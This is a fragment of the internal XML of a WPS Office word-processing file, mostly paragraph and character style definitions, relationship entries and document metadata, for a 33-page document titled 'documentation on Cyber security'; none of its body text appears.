    <w:next w:val="style31"/>
    <w:link w:val="style4121"/>
    <w:uiPriority w:val="99"/>
    <w:pPr/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4121">
    <w:name w:val="Header Char_a998ce67-7c39-40a8-ba82-ff7399ab3487"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4121"/>
    <w:link w:val="style31"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style32">
    <w:name w:val="footer"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style32"/>
    <w:link w:val="style4122"/>
    <w:uiPriority w:val="99"/>
    <w:pPr/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4122">
    <w:name w:val="Footer Char_7b59da1c-b3b7-4d82-8d19-fbc5607b9519"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4122"/>
    <w:link w:val="style32"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style27">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="1757"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style157">
    <w:name w:val="No Spacing"/>
    <w:next w:val="style157"/>
    <w:link w:val="style4123"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:spacing w:after="0" w:lineRule="auto" w:line="240"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4123">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4123"/>
    <w:link w:val="style157"/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style266">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="style1"/>
    <w:next w:val="style0"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4124">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4124"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605e5c"/>
      <w:shd w:val="clear" w:color="auto" w:fill="e1dfdd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style94">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style94"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="true" w:after="100" w:afterAutospacing="true" w:lineRule="auto" w:line="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4125">
    <w:name w:val="ipaddr"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4125"/>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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="style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_rels/item3.xml.rels><?xml version="1.0" encoding="UTF-8"?>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Normal</Template>
  <TotalTime>4</TotalTime>
  <Words>3695</Words>
  <Pages>33</Pages>
  <Characters>23223</Characters>
  <Application>WPS Office</Application>
  <DocSecurity>0</DocSecurity>
  <Paragraphs>468</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>26714</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2023-07-22T07:30:00Z</dcterms:created>
  <dc:creator>WPS Office</dc:creator>
  <lastModifiedBy>RMX3085</lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-24T13:15:47Z</dcterms:modified>
  <revision>3</revision>
  <dc:title>documentation on Cyber security</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ICV">
    <vt:lpwstr>5ca8cc284f4847a191334d379e9e424e</vt:lpwstr>
  </property>
</Properties>
</file>